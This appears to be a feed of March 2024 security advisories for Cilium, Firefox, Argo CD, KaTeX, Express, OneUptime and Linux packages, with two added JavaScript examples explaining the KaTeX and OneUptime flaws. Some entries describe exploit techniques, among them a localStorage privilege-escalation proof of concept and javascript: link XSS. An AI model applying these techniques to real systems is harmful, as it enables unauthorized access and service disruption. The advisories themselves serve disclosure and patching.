22.03.2024 23:22:19 | go | [GO-2024-2656] Unencrypted traffic between nodes with IPsec in github.com/cilium/cilium (medium) | In Cilium clusters with IPsec enabled and traffic matching Layer 7 policies, traffic that should be IPsec-encrypted between a node's Envoy proxy and pods on other nodes is sent unencrypted, and traffic that should be IPsec-encrypted between a node's DNS proxy and pods on other nodes is sent unencrypted. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2656
22.03.2024 08:08:21 | go | [GO-2024-2653] HTTP policy bypass in github.com/cilium/cilium (high) | Cilium's HTTP policies are not consistently applied to all traffic in the scope of the policies, leading to HTTP traffic being incorrectly and intermittently forwarded when it should be dropped. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2653
22.03.2024 02:00:00 | mozilla | [MFSA-2024-15] Security Vulnerabilities fixed in Firefox 124.0.1 (critical) | - CVE-2024-29943: Out-of-bounds access via Range Analysis bypass (critical) An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. - CVE-2024-29944: Privileged JavaScript Execution via Event Handlers (critical) An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. Note: This vulnerability affects Desktop Firefox only, it does not affect mobile versions of Firefox. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-15
22.03.2024 02:00:00 | mozilla | [MFSA-2024-16] Security Vulnerabilities fixed in Firefox ESR 115.9.1 (critical) | - CVE-2024-29944: Privileged JavaScript Execution via Event Handlers (critical) An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. Note: This vulnerability affects Desktop Firefox only, it does not affect mobile versions of Firefox. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-16
22.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1472] go-toolset:ol8 security update (important) | delve [1.20.2-1.0.1] - Disable DWARF compression which has issues (Alex Burmashev) [1.20.2-1] - Rebase to 1.20.2 - Resolves: rhbz#2186495 golang [1.20.12-3] - Fix CVE-2024-1394 - Resolves: RHEL-27928 [1.20.12-2] - Fix sources file - Related: RHEL-19231 go-toolset | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1472
22.03.2024 01:16:29 | go | [GO-2024-2654] Denial of service in github.com/argoproj/argo-cd/v2 (high) | Application may crash due to concurrent writes, leading to a denial of service. An attacker can crash the application continuously, making it impossible for legitimate users to access the service. Authentication is not required in the attack. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2654
22.03.2024 00:42:40 | go | [GO-2024-2652] Brute force protection bypass in github.com/argoproj/argo-cd/v2 (critical) | An attacker can effectively bypass the rate limit and brute force protections in Argo CD by exploiting the application's weak cache-based mechanism. The application's brute force protection relies on a cache mechanism that tracks login attempts for each user. An attacker can overflow this cache by bombarding it with login attempts for different users, thereby pushing out the admin account's failed attempts and effectively resetting the rate limit for that account. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2652
21.03.2024 23:50:54 | go | [GO-2024-2646] Cross-site scripting on application summary component in github.com/argoproj/argo-cd/v2 (critical) | Due to the improper URL protocols filtering of links specified in the link.argocd.argoproj.io annotations in the application summary component, an attacker can achieve cross-site scripting with elevated permissions. A malicious user can inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin). This vulnerability allows an attacker to perform arbitrary actions on behalf of the victim via the API, such as creating, modifying, and deleting Kubernetes resources. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2646
21.03.2024 23:35:06 | go | [GO-2024-2643] Bypass manifest during application creation in github.com/argoproj/argo-cd/v2 (medium) | An improper validation bug allows users who have create privileges to sync a local manifest during application creation. This allows for bypassing the restriction that the manifests come from some approved git/Helm/OCI source. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2643
22.03.2024 11:53:38 | almalinux | [ALSA-2024:1472] go-toolset:rhel8 security update (important) | go-toolset:rhel8 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1472
22.03.2024 16:43:50 | almalinux | [ALSA-2024:1462] golang security update (important) | golang security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1462
22.03.2024 16:57:34 | almalinux | [ALSA-2024:1427] libreoffice security update (important) | libreoffice security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1427
23.03.2024 21:41:05 | slackware | [SSA:2024-083-01] mozilla-firefox | New mozilla-firefox packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ``` patches/packages/mozilla-firefox-115.9.1esr-i686-1_slack15.0.txz: Upgraded. This update fixes a critical security issue: An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. For more information, see: https://www.mozilla.org/en-US/firefox/115.9.1esr/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-16/ https://www.cve.org/CVERecord?id=CVE-2024-29944 (* Security fix *) ``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.9.1esr-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.9.1esr-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.9.1esr-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.9.1esr-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 99c90f4ea4e3ed0fd8ba2ef14c0d8a83 mozilla-firefox-115.9.1esr-i686-1_slack15.0.txz Slackware x86_64 15.0 package: 44a7a466cdfff46a159fb5a0e2519f7c mozilla-firefox-115.9.1esr-x86_64-1_slack15.0.txz Slackware -current package: b7633f0ba237545172c1854369502dce xap/mozilla-firefox-115.9.1esr-i686-1.txz Slackware x86_64 -current package: 5ac5ad1d77f88975c6f0ea787865123c xap/mozilla-firefox-115.9.1esr-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg mozilla-firefox-115.9.1esr-i686-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-083-01
23.03.2024 02:00:00 | debian | [DSA-5645-1] firefox-esr | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5645-1
24.03.2024 20:25:32 | slackware | [SSA:2024-084-01] emacs (high) | New emacs packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ``` patches/packages/emacs-29.3-i586-1_slack15.0.txz: Upgraded. GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-45939 (* Security fix *) ``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/emacs-29.3-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/emacs-29.3-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/e/emacs-29.3-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/e/emacs-29.3-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 8bc1c8849d6487b3edd7ddec5d006cc6 emacs-29.3-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 4849c24a9f196f58e67fcb01da4d124e emacs-29.3-x86_64-1_slack15.0.txz Slackware -current package: a056d1a49f5570b1d598f1c5ebc14077 e/emacs-29.3-i586-1.txz Slackware x86_64 -current package: 67ae9819b6728f52705f3a8c56f2d150 e/emacs-29.3-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg emacs-29.3-i586-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-084-01
24.03.2024 02:00:00 | debian | [DSA-5646-1] cacti (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5646-1
24.03.2024 02:00:00 | debian | [DSA-5647-1] samba (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5647-1
24.03.2024 22:23:59 | maven | [MAVEN:GHSA-7F88-5HHX-67M2] XNIO denial of service vulnerability (high) | A flaw was found in XNIO. The XNIO NotifierState that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large can lead to uncontrolled resource management and a possible denial of service (DoS). Version 3.8.14.Final is expected to contain a fix. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7F88-5HHX-67M2
25.03.2024 02:46:36 | rubysec | [RUBYSEC:RDOC-2024-27281] RCE vulnerability with .rdoc_options in RDoc | An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. When parsing `.rdoc_options` (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored. When loading the documentation cache, object injection and resultant remote code execution are also possible if there were a crafted cache. We recommend updating the RDoc gem to version 6.6.3.1 or later. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead: * For Ruby 3.0 users: Update to `rdoc` 6.3.4.1 * For Ruby 3.1 users: Update to `rdoc` 6.4.1.1 * For Ruby 3.2 users: Update to `rdoc` 6.5.1.1 You can use `gem update rdoc` to update it. If you are using bundler, please add `gem "rdoc", ">= 6.6.3.1"` to your `Gemfile`. Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have an incorrect fix. We recommend upgrading to 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them. | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RDOC-2024-27281
25.03.2024 02:43:41 | rubysec | [RUBYSEC:STRINGIO-2024-27280] Buffer overread vulnerability in StringIO | An issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x through 3.0.6 and 3.1.x through 3.1.4. The `ungetbyte` and `ungetc` methods on a StringIO can read past the end of a string, and a subsequent call to `StringIO.gets` may return the memory value. This vulnerability does not affect StringIO 3.0.3 and later, or Ruby 3.2.x and later. We recommend updating the StringIO gem to version 3.0.3 or later. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead: * For Ruby 3.0 users: Update to `stringio` 3.0.1.1 * For Ruby 3.1 users: Update to `stringio` 3.0.1.2 You can use `gem update stringio` to update it. If you are using bundler, please add `gem "stringio", ">= 3.0.1.2"` to your `Gemfile`. | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:STRINGIO-2024-27280
26.03.2024 01:59:32 | ubuntu | [USN-6716-1] Linux kernel (Azure) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6716-1
26.03.2024 01:58:12 | ubuntu | [USN-6701-3] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-3
26.03.2024 01:24:11 | ubuntu | [USN-6704-3] Linux kernel (Oracle) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-3
26.03.2024 01:07:30 | ubuntu | [USN-6707-3] Linux kernel (AWS) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-3
26.03.2024 00:31:42 | maven | [MAVEN:GHSA-5JPM-X58V-624V] Netty's HttpPostRequestDecoder can OOM (moderate) | ### Summary The `HttpPostRequestDecoder` can be tricked to accumulate data. I have spotted currently two attack vectors. ### Details 1. While the decoder can store items on the disk if configured so, there are no limits to the number of fields the form can have; an attacker can send a chunked post consisting of many small fields that will be accumulated in the `bodyListHttpData` list. 2. The decoder accumulates bytes in the `undecodedChunk` buffer until it can decode a field; this field can accumulate data without limits. ### PoC Here is a Netty branch that provides a fix + tests: https://github.com/vietj/netty/tree/post-request-decoder Here is a reproducer with Vert.x (which uses this decoder): https://gist.github.com/vietj/f558b8ea81ec6505f1e9a6ca283c9ae3 ### Impact Any Netty based HTTP server that uses the `HttpPostRequestDecoder` to decode a form. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5JPM-X58V-624V
26.03.2024 00:25:02 | npm | [NPM:GHSA-RV95-896H-C2VC] Express.js Open Redirect in malformed URLs (moderate) | ### Impact Versions of Express.js prior to 4.19.2 and pre-release alpha and beta versions before 5.0.0-beta.3 are affected by an open redirect vulnerability using malformed URLs. When a user of Express performs a redirect using a user-provided URL, Express performs an encode [using `encodeurl`](https://github.com/pillarjs/encodeurl) on the contents before passing it to the `location` header. This can cause malformed URLs to be evaluated in unexpected ways by common redirect allow list implementations in Express applications, leading to an Open Redirect via bypass of a properly implemented allow list. The main method impacted is `res.location()` but this is also called from within `res.redirect()`. ### Patches https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94 An initial fix went out with `express@4.19.0`, we then patched a feature regression in `4.19.1` and added improved handling for the bypass in `4.19.2`. ### Workarounds The fix for this involves pre-parsing the url string with either `require('node:url').parse` or `new URL`. These are steps you can take on your own before passing the user input string to `res.location` or `res.redirect`. ### References https://github.com/expressjs/express/pull/5539 https://github.com/koajs/koa/issues/1800 https://expressjs.com/en/4x/api.html#res.location | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RV95-896H-C2VC
26.03.2024 00:32:12 | npm | [NPM:GHSA-3WC5-FCW2-2329] KaTeX missing normalization of the protocol in URLs allows bypassing forbidden protocols (moderate) | ### Impact Code that uses KaTeX's `trust` option, specifically that provides a function to block-list certain URL protocols, can be fooled by URLs in malicious inputs that use uppercase characters in the protocol. In particular, this can allow for malicious input to generate `javascript:` links in the output, even if the `trust` function tries to forbid this protocol via `trust: (context) => context.protocol !== 'javascript'`. ### Patches Upgrade to KaTeX v0.16.10 to remove this vulnerability. ### Workarounds * Allow-list instead of block protocols in your `trust` function. * Manually lowercase `context.protocol` via `context.protocol.toLowerCase()` before attempting to check for certain protocols. * Avoid use of or turn off the `trust` option. ### Details KaTeX did not normalize the `protocol` entry of the `context` object provided to a user-specified `trust`-function, so it could be a mix of lowercase and/or uppercase letters. It is generally better to allow-list by protocol, in which case this would normally not be an issue. But in some cases, you might want to block-list, and the [KaTeX documentation](https://katex.org/docs/options.html) even provides such an example: > Allow all commands but forbid specific protocol: `trust: (context) => context.protocol !== 'file'` Currently KaTeX internally sees `file:` and `File:` URLs as different protocols, so `context.protocol` can be `file` or `File`, so the above check does not suffice. A simple workaround would be: > `trust: (context) => context.protocol.toLowerCase() !== 'file'` Most URL parsers normalize the scheme to lowercase. For example, [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#section-3.1) says: > Although schemes are case-insensitive, the canonical form is lowercase and documents that specify schemes must do so with lowercase letters. An implementation should accept uppercase letters as equivalent to lowercase in scheme names (e.g., allow "HTTP" as well as "http") for the sake of robustness but should only produce lowercase scheme names for consistency. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3WC5-FCW2-2329
26.03.2024 00:32:07npm[NPM:GHSA-F98W-7CXR-FF2H] KaTeX's `\includegraphics` does not escape filename (moderate)### ImpactKaTeX users who render untrusted mathematical expressions could encounter malicious input using `\includegraphics` that runs arbitrary JavaScript, or generate invalid HTML.### PatchesUpgrade to KaTeX v0.16.10 to remove this vulnerability.### Workarounds* Avoid use of or turn off the `trust` option, or set it to forbid `\includegraphics` commands.* Forbid inputs containing the substring `"\\includegraphics"`.* Sanitize HTML output from KaTeX.### Details`\includegraphics` did not properly quote its filename argument, allowing it to generate invalid or malicious HTML that runs scripts.### For more informationIf you have any questions or comments about this advisory:* Open an issue or security advisory in the [KaTeX repository](https://github.com/KaTeX/KaTeX/)* Email us at katex-security@mit.eduhttps://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F98W-7CXR-FF2H
26.03.2024 00:32:02  npm  [NPM:GHSA-CVR6-37GX-V8WC] KaTeX's maxExpand bypassed by Unicode sub/superscripts (moderate)

### Impact

KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\def` or `\newcommand` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow.

### Patches

Upgrade to KaTeX v0.16.10 to remove this vulnerability.

### Workarounds

Forbid inputs containing any of the characters `₊₋₌₍₎₀₁₂₃₄₅₆₇₈₉ₐₑₕᵢⱼₖₗₘₙₒₚᵣₛₜᵤᵥₓᵦᵧᵨᵩᵪ⁺⁻⁼⁽⁾⁰¹²³⁴⁵⁶⁷⁸⁹ᵃᵇᶜᵈᵉᵍʰⁱʲᵏˡᵐⁿᵒᵖʳˢᵗᵘʷˣʸᶻᵛᵝᵞᵟᵠᵡ` before passing them to KaTeX. (There is no easy workaround for the auto-render extension.)

### Details

KaTeX supports an option named `maxExpand` which aims to prevent infinitely recursive macros from consuming all available memory and/or triggering a stack overflow error. Unfortunately, [support for "Unicode (sub|super)script characters"](https://github.com/KaTeX/KaTeX/commit/d8fc35e6a97f8e561c723b93ad275cf5a7f3094a) allows an attacker to bypass this limit. Each sub/superscript group instantiated a separate Parser with its own limit on macro executions, without inheriting the current count of macro executions from its parent. This has been corrected in KaTeX v0.16.10.

### For more information

If you have any questions or comments about this advisory:

* Open an issue or security advisory in the [KaTeX repository](https://github.com/KaTeX/KaTeX/)
* Email us at [katex-security@mit.edu](mailto:katex-security@mit.edu)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CVR6-37GX-V8WC

26.03.2024 00:31:57  npm  [NPM:GHSA-64FM-8HW2-V72W] KaTeX's maxExpand bypassed by `\edef` (moderate)

### Impact

KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\edef` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow.

### Patches

Upgrade to KaTeX v0.16.10 to remove this vulnerability.

### Workarounds

Forbid inputs containing the substring `"\\edef"` before passing them to KaTeX. (There is no easy workaround for the auto-render extension.)

### Details

KaTeX supports an option named `maxExpand` which prevents infinitely recursive macros from consuming all available memory and/or triggering a stack overflow error. However, what counted as an "expansion" was a single macro expanding to any number of tokens. The expand-and-define TeX command `\edef` can be used to build up an exponential number of tokens using only a linear number of expansions according to this definition, e.g. by repeatedly doubling the previous definition. This has been corrected in KaTeX v0.16.10, where every expanded token in an `\edef` counts as an expansion.

### For more information

If you have any questions or comments about this advisory:

* Open an issue or security advisory in the [KaTeX repository](https://github.com/KaTeX/KaTeX/)
* Email us at [katex-security@mit.edu](mailto:katex-security@mit.edu)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-64FM-8HW2-V72W
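The two `maxExpand` accounting flaws in the preceding advisories (a fresh counter for every Unicode sub/superscript group, and an `\edef` counted as one expansion however many tokens it builds), as an added toy model rather than KaTeX's parser. `edefDoubling` simulates `n` rounds of `\edef\a{\a\a}` under both accounting rules; `nestedGroups` simulates child parsers that either start their own counter at zero or inherit the parent's count. The limit of 1000 is KaTeX's documented default for `maxExpand`; the scenario sizes are constructed.

```javascript
// Added example, not KaTeX's parser: toy models of the two maxExpand bypasses.

class ExpandLimitExceeded extends Error {}

// Simulates `\def\a{x}` followed by n rounds of `\edef\a{\a\a}`.
//   countTokens = false -> each macro invocation costs 1 (old rule)
//   countTokens = true  -> every token an expansion produces costs 1 (fixed rule)
// Returns { expansions, tokens } or throws ExpandLimitExceeded.
function edefDoubling(n, maxExpand, countTokens) {
  let body = ['x'];          // current replacement text of \a
  let expansions = 0;
  for (let round = 0; round < n; round++) {
    let produced = [];
    for (let k = 0; k < 2; k++) {          // \a\a: two invocations
      expansions += countTokens ? body.length : 1;
      if (expansions > maxExpand) {
        throw new ExpandLimitExceeded(`maxExpand hit in round ${round}`);
      }
      produced = produced.concat(body);    // memory doubles every round
    }
    body = produced;                       // \edef stores the fully expanded text
  }
  return { expansions, tokens: body.length };
}

// Simulates `groups` sub/superscript groups, each doing `perGroup` expansions.
//   inherit = false -> each child Parser starts its own counter at 0 (bug)
//   inherit = true  -> the child continues from the parent's count (fix)
// Returns the total work actually done, or throws ExpandLimitExceeded.
function nestedGroups(groups, perGroup, maxExpand, inherit) {
  let parentCount = 0;
  let totalWork = 0;
  for (let g = 0; g < groups; g++) {
    let count = inherit ? parentCount : 0;
    for (let i = 0; i < perGroup; i++) {
      count += 1;
      totalWork += 1;
      if (count > maxExpand) throw new ExpandLimitExceeded(`maxExpand hit in group ${g}`);
    }
    parentCount = count;
  }
  return totalWork;
}

// Run a scenario and report instead of throwing, for side-by-side comparison.
function outcome(fn) {
  try {
    return { limited: false, result: fn() };
  } catch (e) {
    if (e instanceof ExpandLimitExceeded) return { limited: true, reason: e.message };
    throw e;
  }
}

const MAX_EXPAND = 1000;   // KaTeX's documented default
console.log(outcome(() => edefDoubling(20, MAX_EXPAND, false)));      // 40 expansions, 1048576 tokens
console.log(outcome(() => edefDoubling(20, MAX_EXPAND, true)));       // limited in round 8
console.log(outcome(() => nestedGroups(50, 900, MAX_EXPAND, false))); // 45000 expansions, never limited
console.log(outcome(() => nestedGroups(50, 900, MAX_EXPAND, true)));  // limited in group 1
```

The numbers make the point of both fixes: under the old rules twenty `\edef` rounds cost 40 "expansions" but hold 2^20 tokens in memory, and fifty groups of 900 expansions each do 45,000 units of work without any of them crossing a limit of 1000. Any resource limit has to count the quantity that actually exhausts the resource, and it has to be shared across every sub-parser the same input can spawn.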
25.03.2024 21:37:28  npm  [NPM:GHSA-246P-XMG8-WMCQ] OneUptime Vulnerable to a Privilege Escalation via Local Storage Key Manipulation (high)

## Summary

A security vulnerability exists in OneUptime's local storage handling, where a regular user can escalate privileges by modifying the `is_master_admin` key to `true`. This allows unauthorized access to administrative functionalities.

## Details

The vulnerability lies in the improper validation of client-side stored data within the web application. Specifically, the `is_master_admin` key, stored in the local storage of the browser, can be manipulated by an attacker. By changing this key from `false` to `true`, the application grants administrative privileges to the user, without proper server-side validation.

## POC

(I am using Firefox Developer to demonstrate this vulnerability.)

Log in as a normal user. Open developer tools (hit F12), click Storage, then Local Storage. Modify the `is_master_admin` key from `false` to `true`.

## Impact

This vulnerability represents a high security risk as it allows any authenticated user to gain administrative privileges through client-side manipulation. Most of the admin privileges were disabled except the user list, where an attacker could see the full list of users who signed up to OneUptime.

## Patch

This has been patched in 7.0.1815.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-246P-XMG8-WMCQ
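The difference between the flaw described above and its fix, as an added example that is not OneUptime's code: an admin-only "list users" handler that trusts an `is_master_admin` flag echoed back from the browser, next to one that derives the flag from the server's own session and user records. The request shape, session store and user records are constructed for the example.

```javascript
// Added example, not OneUptime's code: client-trusted vs server-derived admin check.

// Constructed server-side state: user records and active sessions.
const USERS = new Map([
  ['u-alice', { id: 'u-alice', email: 'alice@example.test', isMasterAdmin: false }],
  ['u-bob',   { id: 'u-bob',   email: 'bob@example.test',   isMasterAdmin: true  }],
]);
const SESSIONS = new Map([
  ['sess-alice', 'u-alice'],
  ['sess-bob',   'u-bob'],
]);

// What a browser sends: its session cookie plus whatever the SPA read back
// from localStorage. The second part is attacker-controlled, as the PoC shows.
function makeRequest(sessionId, localStorageClaims) {
  return { cookies: { session: sessionId }, body: { claims: localStorageClaims } };
}

function userList() {
  return [...USERS.values()].map((u) => u.email);
}

// Vulnerable: the authorization decision rests on a flag the client supplied.
function listUsersVulnerable(req) {
  if (req.body.claims.is_master_admin !== true) return { status: 403 };
  return { status: 200, body: userList() };
}

// Hardened: the flag is never read from the request; it comes from the
// server's own record for the authenticated session.
function listUsersHardened(req) {
  const userId = SESSIONS.get(req.cookies.session);
  const user = userId ? USERS.get(userId) : undefined;
  if (!user) return { status: 401 };
  if (!user.isMasterAdmin) return { status: 403 };
  return { status: 200, body: userList() };
}

// Alice is a regular user who flipped is_master_admin in DevTools -> Storage.
const forged = makeRequest('sess-alice', { is_master_admin: true });
console.log('vulnerable:', listUsersVulnerable(forged).status); // 200
console.log('hardened  :', listUsersHardened(forged).status);   // 403
```

Client-side state such as localStorage may drive what the UI shows, but every privileged route has to re-derive the caller's role from state the server controls. A quick audit: grep the backend for reads of any role flag that originates in a request body, header or cookie other than the session identifier itself.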
25.03.2024 17:33:30  ubuntu  [USN-6714-1] Debian Goodies vulnerability (high)
debmany in Debian Goodies could be made to execute arbitrary shell commands if it received a specially crafted deb file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6714-1

25.03.2024 21:34:46  npm  [NPM:GHSA-8PPR-WWW8-HFJX] @thi.ng/paths Prototype Pollution vulnerability (high)
An issue in @thi.ng/paths v.5.1.62 and before allows a remote attacker to execute arbitrary code via the `mutIn` and `mutInManyUnsafe` components.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8PPR-WWW8-HFJX

25.03.2024 14:01:37  ubuntu  [USN-6713-1] QPDF vulnerability
QPDF could be made to crash or run programs if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6713-1

25.03.2024 13:56:34  ubuntu  [USN-6712-1] Net::CIDR::Lite vulnerability
Net::CIDR::Lite could allow unintended access to network services.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6712-1

25.03.2024 12:51:33  ubuntu  [USN-6711-1] CRM shell vulnerability (high)
CRM shell could be made to execute arbitrary code if it received a specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6711-1

25.03.2024 21:36:43  npm  [NPM:GHSA-87QP-7CW8-8Q9C] web3-utils Prototype Pollution vulnerability (high)
Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to an insecure recursive merge. An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype, by passing specially crafted input to these functions.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-87QP-7CW8-8Q9C

25.03.2024 03:38:21  ubuntu  [USN-6710-1] Firefox vulnerabilities
Several security issues were fixed in Firefox.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6710-1
25.03.2024 11:14:09  rustsec  [RUSTSEC-2024-0320] yaml-rust is unmaintained.
The maintainer seems [unreachable](https://github.com/chyh1990/yaml-rust/issues/197). Many issues and pull requests have been submitted over the years without any [response](https://github.com/chyh1990/yaml-rust/issues/160).

## Alternatives

Consider switching to the actively maintained `yaml-rust2` fork of the original project:

- [yaml-rust2](https://github.com/Ethiraric/yaml-rust2)
- [yaml-rust2 @ crates.io](https://crates.io/crates/yaml-rust2)

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0320
26.03.2024 23:23:48  npm  [NPM:GHSA-438C-3975-5X3F] TinyMCE Cross-Site Scripting (XSS) vulnerability in handling iframes (moderate)

### Impact

A [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) vulnerability was discovered in TinyMCE's content insertion code. This allowed `iframe` elements containing malicious code to execute when inserted into the editor. These `iframe` elements are restricted in their permissions by same-origin browser protections, but could still trigger operations such as downloading of malicious assets.

### Fix

TinyMCE 6.8.1 introduced a new `sandbox_iframes` boolean option which, when enabled, adds the `sandbox=""` attribute to every `iframe` element by default. This prevents cross-origin, and in special cases same-origin, XSS by embedded resources in `iframe` elements. From TinyMCE 7.0.0 onwards the default value of this option is `true`.

In TinyMCE 7.0.0 a new `sandbox_iframes_exclusions` option was also added, allowing a list of domains to be specified that should be excluded from having the `sandbox=""` attribute applied when the `sandbox_iframes` option is enabled. By default, this option is set to an array of domains that are provided in embed code by popular websites. To sandbox `iframe` elements from every domain, set this option to `[]`.

### Workarounds

The HTTP Content-Security-Policy (CSP) `frame-src` or `object-src` directives can be configured to restrict or block the loading of unauthorized URLs. Refer to the [TinyMCE Content Security Policy Guide](https://www.tiny.cloud/docs/tinymce/latest/tinymce-and-csp/).

### References

- [TinyMCE 6.8.1](https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types)
- [TinyMCE 7.0.0](https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#sandbox_iframes-editor-option-is-now-defaulted-to-true)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-438C-3975-5X3F
26.03.2024 10:51:04  ubuntu  [USN-6717-1] Thunderbird vulnerabilities (high)
Several security issues were fixed in Thunderbird.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6717-1

26.03.2024 10:15:35  alpinelinux  [ALPINE:CVE-2023-6175] wireshark vulnerability (high)
[From CVE-2023-6175] NetScreen file parser crash in Wireshark 4.0.0 to 4.0.10 and 3.6.0 to 3.6.18 allows denial of service via a crafted capture file.
